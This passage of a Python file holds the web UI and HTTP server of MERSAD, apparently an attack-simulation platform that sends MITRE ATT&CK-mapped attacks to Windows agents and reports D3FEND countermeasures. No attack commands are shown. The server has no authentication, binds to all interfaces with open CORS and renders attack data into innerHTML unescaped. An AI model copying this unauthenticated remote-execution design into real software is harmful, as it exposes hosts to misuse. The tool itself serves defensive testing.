                </div>
                <div id="agentList" class="agent-list">
                    <div class="empty-state">
                        <h4>No agents registered</h4>
                        <p>Add a Windows agent to get started</p>
                    </div>
                </div>
            </div>
        </div>
        
        <!-- Library Tab -->
        <div id="tab-library" class="tab-content">
            <div class="card">
                <div class="card-header">
                    <h3>Attack Library</h3>
                    <span id="attackCount">0 attacks</span>
                </div>
                <div class="category-filter" id="categoryFilter"></div>
                <div class="attack-grid" id="attackLibrary"></div>
            </div>
        </div>
        
        <!-- Execute Tab -->
        <div id="tab-execute" class="tab-content">
            <div class="card">
                <div class="card-header">
                    <h3>Execute Attacks</h3>
                </div>
                <div class="form-group">
                    <label>Target Agent</label>
                    <select id="targetAgent">
                        <option value="">Select an agent...</option>
                    </select>
                </div>
                <div class="category-filter" id="execCategoryFilter"></div>
                <div class="attack-grid" id="execAttackGrid"></div>
                <div style="margin-top: 20px; display: flex; gap: 15px;">
                    <button class="btn btn-success" onclick="executeSelected()">Execute Selected</button>
                    <button class="btn btn-danger" onclick="executeAll()">Execute ALL</button>
                    <span id="selectedCount" style="color: #888; align-self: center;">0 attacks selected</span>
                </div>
            </div>
        </div>
        
        <!-- History Tab -->
        <div id="tab-history" class="tab-content">
            <div class="card">
                <div class="card-header">
                    <h3>Execution History</h3>
                    <button class="btn btn-sm btn-danger" onclick="clearHistory()">Clear History</button>
                </div>
                <div class="search-bar">
                    <input type="text" id="historySearch" placeholder="Search attacks..." onkeyup="filterHistory()">
                    <select id="historyFilter" onchange="filterHistory()">
                        <option value="all">All Status</option>
                        <option value="success">Success Only</option>
                        <option value="failed">Failed Only</option>
                    </select>
                </div>
                <div id="historyContainer">
                    <table class="history-table">
                        <thead>
                            <tr>
                                <th>Time</th>
                                <th>Attack</th>
                                <th>Target</th>
                                <th>Category</th>
                                <th>MITRE ID</th>
                                <th>Status</th>
                            </tr>
                        </thead>
                        <tbody id="historyBody"></tbody>
                    </table>
                </div>
                <div class="pagination" id="historyPagination"></div>
            </div>
        </div>
        
        <!-- Reports Tab -->
        <div id="tab-reports" class="tab-content">
            <div class="card">
                <div class="card-header">
                    <h3>Session Report</h3>
                    <button class="btn btn-sm" onclick="exportCSV()">Export Full Report (CSV)</button>
                </div>
                <p style="color: #888; margin-bottom: 20px; font-size: 0.9rem;">
                    CSV export includes: Commands executed, MITRE ATT&CK mapping, D3FEND countermeasures, Detection tips, Prevention tips, and Remediation guidance.
                </p>
                <div class="charts-grid">
                    <div>
                        <h4 style="color: #888; margin-bottom: 15px;">MITRE ATT&CK Tactic Breakdown</h4>
                        <div id="categoryBreakdown"></div>
                    </div>
                    <div>
                        <h4 style="color: #888; margin-bottom: 15px;">Severity Distribution</h4>
                        <div id="severityBreakdown"></div>
                    </div>
                </div>
            </div>
            <div class="card" style="margin-top: 20px;">
                <h3 style="margin-bottom: 15px;">D3FEND Coverage Analysis</h3>
                <p style="color: #888; margin-bottom: 15px; font-size: 0.9rem;">
                    MITRE D3FEND countermeasures recommended based on executed attacks.
                </p>
                <div id="d3fendBreakdown"></div>
            </div>
            <div class="card" style="margin-top: 20px;">
                <h3 style="margin-bottom: 15px;">Defensive Recommendations</h3>
                <p style="color: #888; margin-bottom: 15px; font-size: 0.9rem;">
                    Based on executed attacks, here are recommended defensive actions.
                </p>
                <div id="defensiveRecommendations"></div>
            </div>
        </div>
        
        <!-- About Tab -->
        <div id="tab-about" class="tab-content">
            <div class="card">
                <div style="text-align: center; padding: 40px 20px;">
                    <div style="font-family: 'Cairo', sans-serif; font-size: 3rem; background: linear-gradient(135deg, #ff6b6b 0%, #8a2eff 100%); -webkit-background-clip: text; -webkit-text-fill-color: transparent; margin-bottom: 10px;">
                        مرصاد
                    </div>
                    <h1 style="font-family: 'Orbitron', sans-serif; font-size: 2.5rem; background: linear-gradient(135deg, #00d4ff 0%, #8a2eff 50%, #ff6b6b 100%); -webkit-background-clip: text; -webkit-text-fill-color: transparent; margin-bottom: 20px;">
                        MERSAD
                    </h1>
                    <p style="color: #888; font-size: 1.1rem; margin-bottom: 30px;">
                        Kali Attacker Web UI - Standalone Edition
                    </p>
                    <div style="background: rgba(0,212,255,0.1); border: 1px solid rgba(0,212,255,0.3); border-radius: 12px; padding: 25px; max-width: 500px; margin: 0 auto 30px;">
                        <p style="color: #00d4ff; font-size: 1.2rem; margin-bottom: 5px;">Version</p>
                        <p style="color: #fff; font-size: 2rem; font-weight: 700;" id="aboutVersion">1.0.0</p>
                    </div>
                    <div style="background: rgba(255,255,255,0.03); border-radius: 12px; padding: 30px; max-width: 500px; margin: 0 auto;">
                        <h3 style="color: #00d4ff; margin-bottom: 20px;">Created By</h3>
                        <p style="color: #fff; font-size: 1.3rem; margin-bottom: 10px;">Engineer Malek Shashaa</p>
                        <p style="color: #888;">
                            <a href="mailto:malekshashaa1993@gmail.com" style="color: #00d4ff; text-decoration: none;">malekshashaa1993@gmail.com</a>
                        </p>
                    </div>
                    <div style="margin-top: 40px;">
                        <p style="color: #666; font-size: 0.9rem;">
                            A comprehensive attack generation platform for security testing.<br>
                            All simulations use benign commands - no real malware.
                        </p>
                        <p style="color: #ff6b6b; margin-top: 15px; font-size: 0.85rem;">
                            For authorized security testing only.
                        </p>
                    </div>
                    <div id="updateSection" style="margin-top: 40px; padding: 25px; background: rgba(255,165,0,0.1); border: 1px solid rgba(255,165,0,0.3); border-radius: 12px; display: none;">
                        <h4 style="color: #ffa500; margin-bottom: 15px;">Update Available!</h4>
                        <p style="color: #888; margin-bottom: 10px;">Version <span id="updateNewVersion"></span> is available</p>
                        <p style="color: #666; font-size: 0.9rem; margin-bottom: 20px;" id="updateReleaseNotes"></p>
                        <button class="btn btn-success" onclick="downloadUpdate()">Download Update</button>
                    </div>
                </div>
            </div>
        </div>
    </div>
    
    <!-- Update Notification Popup -->
    <div id="updatePopup" style="display: none; position: fixed; top: 20px; right: 20px; background: linear-gradient(135deg, rgba(255,165,0,0.95) 0%, rgba(255,107,107,0.95) 100%); border-radius: 12px; padding: 20px 25px; z-index: 1000; box-shadow: 0 10px 40px rgba(0,0,0,0.5); max-width: 350px;">
        <div style="display: flex; justify-content: space-between; align-items: start; gap: 15px;">
            <div>
                <h4 style="color: #000; margin-bottom: 8px;">Update Available!</h4>
                <p style="color: rgba(0,0,0,0.7); font-size: 0.9rem;">A new version (<span id="popupNewVersion"></span>) is ready to download.</p>
            </div>
            <button onclick="closeUpdatePopup()" style="background: none; border: none; color: #000; font-size: 1.5rem; cursor: pointer; padding: 0; line-height: 1;">&times;</button>
        </div>
        <div style="margin-top: 15px; display: flex; gap: 10px;">
            <button onclick="showTab('about'); closeUpdatePopup();" style="background: #000; color: #fff; border: none; padding: 8px 16px; border-radius: 6px; cursor: pointer; font-weight: 600;">View Details</button>
            <button onclick="closeUpdatePopup()" style="background: rgba(0,0,0,0.2); color: #000; border: none; padding: 8px 16px; border-radius: 6px; cursor: pointer;">Later</button>
        </div>
    </div>
    
    <script>
        let attacks = [];
        let agents = {};
        let history = [];
        let stats = { total_executed: 0, successful: 0, failed: 0 };
        let selectedAttacks = new Set();
        let currentCategory = 'All';
        let historyPage = 1;
        const PAGE_SIZE = 15;
        
        // Initialize
        document.addEventListener('DOMContentLoaded', () => {
            fetchData();
            setInterval(fetchData, 10000);
        });
        
        async function fetchData() {
            try {
                const res = await fetch('/api/data');
                const data = await res.json();
                attacks = data.attacks || [];
                agents = data.agents || {};
                history = data.history || [];
                stats = data.stats || { total_executed: 0, successful: 0, failed: 0 };
                updateUI();
            } catch (e) {
                console.error('Failed to fetch data:', e);
            }
        }
        
        function updateUI() {
            // Metrics
            document.getElementById('metricAttacks').textContent = attacks.length;
            document.getElementById('metricExecuted').textContent = stats.total_executed;
            document.getElementById('metricSuccess').textContent = stats.successful;
            document.getElementById('metricFailed').textContent = stats.failed;
            document.getElementById('metricAgents').textContent = Object.keys(agents).length;
            const rate = stats.total_executed > 0 ? Math.round((stats.successful / stats.total_executed) * 100) : 0;
            document.getElementById('metricRate').textContent = rate + '%';
            
            // Attack count
            document.getElementById('attackCount').textContent = attacks.length + ' attacks';
            
            // Categories
            const categories = ['All', ...new Set(attacks.map(a => a.category))].sort();
            const filterHtml = categories.map(c => 
                `<button class="category-btn ${c === currentCategory ? 'active' : ''}" onclick="filterByCategory('${c}')">${c}</button>`
            ).join('');
            document.getElementById('categoryFilter').innerHTML = filterHtml;
            document.getElementById('execCategoryFilter').innerHTML = filterHtml;
            
            // Attack library
            renderAttackLibrary();
            renderExecGrid();
            
            // Agents
            renderAgents();
            
            // Target agent dropdown
            const agentSelect = document.getElementById('targetAgent');
            const currentValue = agentSelect.value;
            agentSelect.innerHTML = '<option value="">Select an agent...</option>' + 
                Object.values(agents).map(a => 
                    `<option value="${a.id}" ${a.id === currentValue ? 'selected' : ''}>${a.id} (${a.status})</option>`
                ).join('');
            
            // History
            renderHistory();
            
            // Recent activity
            renderRecentActivity();
            
            // Charts
            renderCharts();
            
            // Reports
            renderReports();
        }
        
        function renderAttackLibrary() {
            const filtered = currentCategory === 'All' ? attacks : attacks.filter(a => a.category === currentCategory);
            document.getElementById('attackLibrary').innerHTML = filtered.map(a => `
                <div class="attack-card" onclick="showAttackDetails('${a.id}')">
                    <h4>${a.name}</h4>
                    <p class="desc">${a.description}</p>
                    <div class="meta">
                        <span class="tag category">${a.category}</span>
                        <span class="tag mitre">${a.mitre_id}</span>
                        <span class="tag severity-${a.severity}">${a.severity}</span>
                    </div>
                </div>
            `).join('') || '<div class="empty-state"><h4>No attacks found</h4></div>';
        }
        
        function renderExecGrid() {
            const filtered = currentCategory === 'All' ? attacks : attacks.filter(a => a.category === currentCategory);
            document.getElementById('execAttackGrid').innerHTML = filtered.map(a => `
                <div class="attack-card ${selectedAttacks.has(a.id) ? 'selected' : ''}" onclick="toggleAttack('${a.id}')">
                    <h4>${a.name}</h4>
                    <p class="desc">${a.description}</p>
                    <div class="meta">
                        <span class="tag category">${a.category}</span>
                        <span class="tag mitre">${a.mitre_id}</span>
                    </div>
                </div>
            `).join('');
            document.getElementById('selectedCount').textContent = selectedAttacks.size + ' attacks selected';
        }
        
        function renderAgents() {
            const list = Object.values(agents);
            if (list.length === 0) {
                document.getElementById('agentList').innerHTML = '<div class="empty-state"><h4>No agents registered</h4><p>Add a Windows agent to get started</p></div>';
                return;
            }
            document.getElementById('agentList').innerHTML = list.map(a => `
                <div class="agent-item">
                    <div class="agent-status ${a.status}"></div>
                    <div class="agent-info">
                        <div class="agent-name">${a.id}</div>
                        <div class="agent-detail">${a.hostname} | ${a.platform} | Last seen: ${a.last_seen || 'Never'}</div>
                    </div>
                    <button class="btn btn-sm btn-secondary" onclick="testAgent('${a.ip}', ${a.port})">Test</button>
                    <button class="btn btn-sm btn-danger" onclick="removeAgent('${a.id}')">Remove</button>
                </div>
            `).join('');
        }
        
        function renderHistory() {
            const search = document.getElementById('historySearch').value.toLowerCase();
            const filter = document.getElementById('historyFilter').value;
            
            let filtered = history;
            if (search) filtered = filtered.filter(h => h.attack_name.toLowerCase().includes(search) || h.attack_id.toLowerCase().includes(search));
            if (filter === 'success') filtered = filtered.filter(h => h.success);
            if (filter === 'failed') filtered = filtered.filter(h => !h.success);
            
            const total = filtered.length;
            const pages = Math.ceil(total / PAGE_SIZE);
            const start = (historyPage - 1) * PAGE_SIZE;
            const pageData = filtered.slice(start, start + PAGE_SIZE);
            
            document.getElementById('historyBody').innerHTML = pageData.map(h => `
                <tr>
                    <td>${new Date(h.timestamp).toLocaleString()}</td>
                    <td>${h.attack_name}</td>
                    <td>${h.agent_id}</td>
                    <td><span class="tag category">${h.category}</span></td>
                    <td><span class="tag mitre">${h.mitre_id}</span></td>
                    <td><span class="status-badge ${h.success ? 'success' : 'failed'}">${h.success ? 'Success' : 'Failed'}</span></td>
                </tr>
            `).join('') || '<tr><td colspan="6" style="text-align:center;color:#666">No history</td></tr>';
            
            // Pagination
            let pagHtml = '';
            for (let i = 1; i <= Math.min(pages, 10); i++) {
                pagHtml += `<button class="${i === historyPage ? 'active' : ''}" onclick="goToPage(${i})">${i}</button>`;
            }
            document.getElementById('historyPagination').innerHTML = pagHtml;
        }
        
        function renderRecentActivity() {
            const recent = history.slice(0, 5);
            if (recent.length === 0) {
                document.getElementById('recentActivity').innerHTML = '<div class="empty-state"><h4>No activity yet</h4><p>Execute some attacks to see activity here</p></div>';
                return;
            }
            document.getElementById('recentActivity').innerHTML = recent.map(h => `
                <div class="agent-item">
                    <div class="agent-status ${h.success ? 'online' : 'offline'}"></div>
                    <div class="agent-info">
                        <div class="agent-name">${h.attack_name}</div>
                        <div class="agent-detail">${h.agent_id} | ${new Date(h.timestamp).toLocaleString()}</div>
                    </div>
                    <span class="status-badge ${h.success ? 'success' : 'failed'}">${h.success ? 'Success' : 'Failed'}</span>
                </div>
            `).join('');
        }
        
        function renderCharts() {
            // Category chart
            const catCounts = {};
            history.forEach(h => { catCounts[h.category] = (catCounts[h.category] || 0) + 1; });
            const catLabels = Object.keys(catCounts);
            const catData = Object.values(catCounts);
            
            const catCtx = document.getElementById('categoryChart');
            if (catCtx._chart) catCtx._chart.destroy();
            catCtx._chart = new Chart(catCtx, {
                type: 'bar',
                data: {
                    labels: catLabels,
                    datasets: [{ data: catData, backgroundColor: '#00d4ff' }]
                },
                options: {
                    plugins: { legend: { display: false } },
                    scales: { y: { beginAtZero: true, ticks: { color: '#888' } }, x: { ticks: { color: '#888' } } }
                }
            });
            
            // Success chart
            const successCtx = document.getElementById('successChart');
            if (successCtx._chart) successCtx._chart.destroy();
            successCtx._chart = new Chart(successCtx, {
                type: 'doughnut',
                data: {
                    labels: ['Success', 'Failed'],
                    datasets: [{ data: [stats.successful, stats.failed], backgroundColor: ['#4caf50', '#ff6b6b'] }]
                },
                options: { plugins: { legend: { position: 'bottom', labels: { color: '#888' } } } }
            });
        }
        
        function renderReports() {
            // Category breakdown
            const catCounts = {};
            history.forEach(h => { catCounts[h.category] = (catCounts[h.category] || 0) + 1; });
            document.getElementById('categoryBreakdown').innerHTML = Object.entries(catCounts)
                .map(([cat, count]) => `<div style="display:flex;justify-content:space-between;padding:8px 0;border-bottom:1px solid rgba(255,255,255,0.05)"><span>${cat}</span><span style="color:#00d4ff">${count}</span></div>`)
                .join('') || '<p style="color:#666">No data</p>';
            
            // Severity breakdown
            const sevCounts = { low: 0, medium: 0, high: 0, critical: 0 };
            history.forEach(h => { if (sevCounts[h.severity] !== undefined) sevCounts[h.severity]++; });
            document.getElementById('severityBreakdown').innerHTML = Object.entries(sevCounts)
                .map(([sev, count]) => `<div style="display:flex;justify-content:space-between;padding:8px 0;border-bottom:1px solid rgba(255,255,255,0.05)"><span class="tag severity-${sev}">${sev}</span><span>${count}</span></div>`)
                .join('');
            
            // D3FEND breakdown - collect all D3FEND countermeasures from executed attacks
            const d3fendCounts = {};
            history.forEach(h => {
                const attack = attacks.find(a => a.id === h.attack_id);
                if (attack && attack.d3fend) {
                    attack.d3fend.forEach(d => { d3fendCounts[d] = (d3fendCounts[d] || 0) + 1; });
                }
            });
            document.getElementById('d3fendBreakdown').innerHTML = Object.entries(d3fendCounts)
                .sort((a, b) => b[1] - a[1])
                .map(([d3f, count]) => `<div style="display:flex;justify-content:space-between;padding:10px;margin-bottom:8px;background:rgba(156,39,176,0.1);border-radius:6px;border-left:3px solid #9c27b0"><span style="color:#ce93d8">${d3f}</span><span style="color:#888">${count} attacks</span></div>`)
                .join('') || '<p style="color:#666">No attacks executed yet</p>';
            
            // Defensive recommendations - aggregate from executed attacks
            const defenseMap = { detection: {}, prevention: {}, remediation: {} };
            history.forEach(h => {
                const attack = attacks.find(a => a.id === h.attack_id);
                if (attack) {
                    if (attack.detection) defenseMap.detection[attack.detection] = (defenseMap.detection[attack.detection] || 0) + 1;
                    if (attack.prevention) defenseMap.prevention[attack.prevention] = (defenseMap.prevention[attack.prevention] || 0) + 1;
                    if (attack.remediation) defenseMap.remediation[attack.remediation] = (defenseMap.remediation[attack.remediation] || 0) + 1;
                }
            });
            
            let defHtml = '';
            if (Object.keys(defenseMap.detection).length > 0) {
                defHtml += '<h4 style="color:#4caf50;margin:15px 0 10px 0;">Detection Recommendations</h4>';
                defHtml += Object.entries(defenseMap.detection).slice(0, 5).map(([tip, count]) => 
                    `<div style="padding:10px;margin-bottom:8px;background:rgba(76,175,80,0.1);border-radius:6px;border-left:3px solid #4caf50;font-size:0.9rem">${tip}</div>`
                ).join('');
            }
            if (Object.keys(defenseMap.prevention).length > 0) {
                defHtml += '<h4 style="color:#00d4ff;margin:15px 0 10px 0;">Prevention Recommendations</h4>';
                defHtml += Object.entries(defenseMap.prevention).slice(0, 5).map(([tip, count]) => 
                    `<div style="padding:10px;margin-bottom:8px;background:rgba(0,212,255,0.1);border-radius:6px;border-left:3px solid #00d4ff;font-size:0.9rem">${tip}</div>`
                ).join('');
            }
            if (Object.keys(defenseMap.remediation).length > 0) {
                defHtml += '<h4 style="color:#ffa500;margin:15px 0 10px 0;">Remediation Recommendations</h4>';
                defHtml += Object.entries(defenseMap.remediation).slice(0, 5).map(([tip, count]) => 
                    `<div style="padding:10px;margin-bottom:8px;background:rgba(255,165,0,0.1);border-radius:6px;border-left:3px solid #ffa500;font-size:0.9rem">${tip}</div>`
                ).join('');
            }
            document.getElementById('defensiveRecommendations').innerHTML = defHtml || '<p style="color:#666">No attacks executed yet</p>';
        }
        
        // Actions
        function showTab(tabId) {
            document.querySelectorAll('.tab-btn').forEach(b => b.classList.remove('active'));
            document.querySelectorAll('.tab-content').forEach(t => t.classList.remove('active'));
            event.target.classList.add('active');
            document.getElementById('tab-' + tabId).classList.add('active');
        }
        
        function filterByCategory(cat) {
            currentCategory = cat;
            updateUI();
        }
        
        function toggleAttack(id) {
            if (selectedAttacks.has(id)) selectedAttacks.delete(id);
            else selectedAttacks.add(id);
            renderExecGrid();
        }
        
        async function addAgent() {
            const ip = document.getElementById('agentIp').value.trim();
            const port = parseInt(document.getElementById('agentPort').value) || 8888;
            if (!ip) { showToast('Please enter an IP address', 'error'); return; }
            
            const res = await fetch('/api/agent/add', {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ ip, port })
            });
            const data = await res.json();
            if (data.success) {
                showToast('Agent added successfully!', 'success');
                document.getElementById('agentIp').value = '';
                fetchData();
            } else {
                showToast('Failed: ' + data.error, 'error');
            }
        }
        
        async function testAgent(ip, port) {
            const res = await fetch('/api/agent/test', {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ ip, port })
            });
            const data = await res.json();
            showToast(data.success ? 'Agent is online!' : 'Agent offline: ' + data.error, data.success ? 'success' : 'error');
            fetchData();
        }
        
        async function removeAgent(agentId) {
            if (!confirm('Remove this agent?')) return;
            await fetch('/api/agent/remove', {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ agent_id: agentId })
            });
            fetchData();
        }
        
        function refreshAgents() {
            Object.values(agents).forEach(a => testAgent(a.ip, a.port));
        }
        
        async function executeSelected() {
            const target = document.getElementById('targetAgent').value;
            if (!target) { showToast('Select a target agent', 'error'); return; }
            if (selectedAttacks.size === 0) { showToast('Select at least one attack', 'error'); return; }
            
            for (const attackId of selectedAttacks) {
                await fetch('/api/execute', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ agent_id: target, attack_id: attackId })
                });
            }
            showToast(`Executed ${selectedAttacks.size} attacks`, 'success');
            selectedAttacks.clear();
            fetchData();
        }
        
        async function executeAll() {
            const target = document.getElementById('targetAgent').value;
            if (!target) { showToast('Select a target agent', 'error'); return; }
            if (!confirm('Execute ALL attacks on this target?')) return;
            
            for (const attack of attacks) {
                await fetch('/api/execute', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ agent_id: target, attack_id: attack.id })
                });
            }
            showToast(`Executed ${attacks.length} attacks`, 'success');
            fetchData();
        }
        
        async function clearHistory() {
            if (!confirm('Clear all history?')) return;
            await fetch('/api/history/clear', { method: 'POST' });
            fetchData();
        }
        
        function filterHistory() { historyPage = 1; renderHistory(); }
        function goToPage(p) { historyPage = p; renderHistory(); }
        
        async function exportCSV() {
            window.location.href = '/api/export/csv';
        }
        
        async function checkForUpdates() {
            showToast('Checking for updates...', 'success');
            const res = await fetch('/api/update');
            const data = await res.json();
            showToast(data.message || data.error, data.success ? 'success' : 'error');
            if (data.success) fetchData();
        }
        
        async function checkVersionUpdate() {
            try {
                const res = await fetch('/api/version-check');
                const data = await res.json();
                if (data.update_available) {
                    document.getElementById('updateSection').style.display = 'block';
                    document.getElementById('updateNewVersion').textContent = data.latest_version;
                    document.getElementById('updateReleaseNotes').textContent = data.release_notes || '';
                    
                    document.getElementById('updatePopup').style.display = 'block';
                    document.getElementById('popupNewVersion').textContent = data.latest_version;
                }
            } catch (e) {
                console.log('Update check skipped (offline mode)');
            }
        }
        
        function closeUpdatePopup() {
            document.getElementById('updatePopup').style.display = 'none';
        }
        
        async function downloadUpdate() {
            showToast('Downloading update...', 'success');
            try {
                const res = await fetch('/api/download-update');
                const data = await res.json();
                if (data.success) {
                    showToast(data.message, 'success');
                    alert('Update downloaded!\\n\\n' + data.instructions);
                } else {
                    showToast('Download failed: ' + data.error, 'error');
                }
            } catch (e) {
                showToast('Download failed: ' + e.message, 'error');
            }
        }
        
        function showAttackDetails(id) {
            const attack = attacks.find(a => a.id === id);
            if (!attack) return;
            
            const d3fendStr = attack.d3fend ? attack.d3fend.join(', ') : 'N/A';
            const details = `
=== ${attack.name} ===

MITRE ATT&CK: ${attack.mitre_id}
Tactic: ${attack.tactic || attack.category}
Category: ${attack.category}
Severity: ${attack.severity.toUpperCase()}

DESCRIPTION:
${attack.description}

COMMANDS:
${attack.commands.join('\\n')}

=== MITRE D3FEND COUNTERMEASURES ===
${d3fendStr}

=== DEFENSIVE RECOMMENDATIONS ===

DETECTION:
${attack.detection || 'N/A'}

PREVENTION:
${attack.prevention || 'N/A'}

REMEDIATION:
${attack.remediation || 'N/A'}
            `.trim();
            
            alert(details);
        }
        
        function showToast(msg, type) {
            const toast = document.createElement('div');
            toast.className = 'toast ' + type;
            toast.textContent = msg;
            document.body.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        // Check for version updates on load (only if online)
        setTimeout(checkVersionUpdate, 3000);
    </script>
</body>
</html>'''


# ============================================================================
# HTTP REQUEST HANDLER
# ============================================================================

class AttackerHandler(BaseHTTPRequestHandler):
    """HTTP request handler for the web UI."""
    
    def log_message(self, format, *args):
        pass  # Suppress default logging
    
    def send_json(self, data: dict, status: int = 200):
        self.send_response(status)
        self.send_header('Content-Type', 'application/json')
        self.send_header('Access-Control-Allow-Origin', '*')
        self.end_headers()
        self.wfile.write(json.dumps(data).encode('utf-8'))
    
    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'Content-Type')
        self.end_headers()
    
    def do_GET(self):
        core = attacker_state.core
        
        if self.path == '/':
            self.send_response(200)
            self.send_header('Content-Type', 'text/html')
            self.send_header('Cache-Control', 'no-cache')
            self.end_headers()
            self.wfile.write(HTML_TEMPLATE.encode('utf-8'))
        
        elif self.path == '/api/data':
            self.send_json({
                'attacks': core.attacks,
                'agents': core.agents,
                'history': core.attack_history,
                'stats': core.stats
            })
        
        elif self.path == '/api/export/csv':
            csv_data = core.export_csv()
            self.send_response(200)
            self.send_header('Content-Type', 'text/csv')
            self.send_header('Content-Disposition', 'attachment; filename="mersad_report.csv"')
            self.end_headers()
            self.wfile.write(csv_data.encode('utf-8'))
        
        elif self.path == '/api/update':
            result = core.check_for_updates()
            self.send_json(result)
        
        elif self.path == '/api/version-check':
            result = core.check_version_update()
            self.send_json(result)
        
        elif self.path == '/api/download-update':
            result = core.download_update()
            self.send_json(result)
        
        elif self.path == '/api/about':
            self.send_json({
                'version': VERSION,
                'creator': CREATOR,
                'platform': 'MERSAD - Cyber Attack Simulation Platform',
                'description': 'A comprehensive attack generation platform for security testing.'
            })
        
        elif self.path == '/api/update-state':
            result = core.get_update_state()
            self.send_json(result)
        
        elif self.path == '/api/reload-attacks':
            result = core.reload_attacks()
            self.send_json(result)
        
        elif self.path == '/api/health':
            self.send_json({
                'status': 'online',
                'version': VERSION,
                'platform': 'MERSAD Kali Attacker'
            })
        
        else:
            self.send_response(404)
            self.end_headers()
    
    def do_POST(self):
        core = attacker_state.core
        content_length = int(self.headers.get('Content-Length', 0))
        body = self.rfile.read(content_length).decode('utf-8') if content_length else '{}'
        
        try:
            data = json.loads(body)
        except:
            data = {}
        
        if self.path == '/api/agent/add':
            ip = data.get('ip', '')
            port = data.get('port', 8888)
            result = core.add_agent(ip, port)
            self.send_json(result)
        
        elif self.path == '/api/agent/test':
            ip = data.get('ip', '')
            port = data.get('port', 8888)
            result = core.test_agent(ip, port)
            self.send_json(result)
        
        elif self.path == '/api/agent/remove':
            agent_id = data.get('agent_id', '')
            result = core.remove_agent(agent_id)
            self.send_json(result)
        
        elif self.path == '/api/execute':
            agent_id = data.get('agent_id', '')
            attack_id = data.get('attack_id', '')
            result = core.execute_attack(agent_id, attack_id)
            self.send_json(result)
        
        elif self.path == '/api/history/clear':
            core.clear_history()
            self.send_json({'success': True})
        
        elif self.path == '/api/sync/receive':
            results = data.get('results', [])
            agent_id = data.get('agent_id', 'unknown')
            count = core.receive_sync(results, agent_id)
            self.send_json({'success': True, 'synced_count': count})
        
        else:
            self.send_response(404)
            self.end_headers()


# ============================================================================
# MAIN
# ============================================================================

def open_browser_delayed(port: int, delay: float = 1.5):
    """Open browser after a short delay to ensure server is ready."""
    time.sleep(delay)
    webbrowser.open(f'http://localhost:{port}')


def install_desktop_shortcut():
    """Install desktop shortcut on first run (Linux only)."""
    if os.name != 'posix':
        return False
    
    desktop_dir = os.path.expanduser('~/.local/share/applications')
    desktop_file = os.path.join(desktop_dir, 'mersad.desktop')
    
    if os.path.exists(desktop_file):
        return False
    
    try:
        os.makedirs(desktop_dir, exist_ok=True)
        script_path = os.path.abspath(__file__)
        
        content = f"""[Desktop Entry]
Type=Application
Name=MERSAD
Comment=Cyber Attack Simulation Platform
Exec=python3 {script_path}
Icon=utilities-terminal
Categories=Security;Network;
Terminal=false
"""
        with open(desktop_file, 'w') as f:
            f.write(content)
        
        os.chmod(desktop_file, 0o755)
        return True
    except Exception:
        return False


def main():
    parser = argparse.ArgumentParser(description='MERSAD Kali Attacker UI - Standalone Edition')
    parser.add_argument('--port', type=int, default=8080, help='Web UI port (default: 8080)')
    parser.add_argument('--mersad', type=str, default=None, help='Optional MERSAD website URL for updates')
    parser.add_argument('--no-browser', action='store_true', help='Do not auto-open browser')
    parser.add_argument('--install-shortcut', action='store_true', help='Install desktop shortcut')
    args = parser.parse_args()
    
    # Install desktop shortcut if requested or on first run
    if args.install_shortcut:
        if install_desktop_shortcut():
            print("Desktop shortcut installed! You can now find MERSAD in your applications menu.")
        else:
            print("Desktop shortcut already exists or could not be installed.")
    
    # Initialize core
    attacker_state.core = AttackerCore(args.mersad)
    
    # Print startup banner
    print("\n" + "="*60)
    print("  MERSAD مرصاد - Kali Attacker UI v" + VERSION)
    print("="*60)
    print(f"\n  Attack Library: {len(attacker_state.core.attacks)} attacks loaded")
    print(f"  Database: {attacker_state.core.db.db_path}")
    print(f"  Local IP: {attacker_state.core.local_ip}")
    print(f"\n  Web UI: http://localhost:{args.port}")
    print(f"\n  Mode: {'Online (updates from ' + args.mersad + ')' if args.mersad else 'Offline (fully standalone)'}")
    print("\n" + "="*60)
    print("  This tool works 100% offline. No internet required.")
    print("  Attack updates are saved locally in the data/ folder.")
    print("="*60 + "\n")
    
    # Auto-open browser unless disabled
    if not args.no_browser:
        browser_thread = threading.Thread(target=open_browser_delayed, args=(args.port,), daemon=True)
        browser_thread.start()
        print("Opening browser...")
    
    # Start server
    server = HTTPServer(('0.0.0.0', args.port), AttackerHandler)
    print(f"Server running on port {args.port}. Press Ctrl+C to stop.\n")
    
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nShutting down...")
        server.shutdown()


if __name__ == '__main__':
    main()
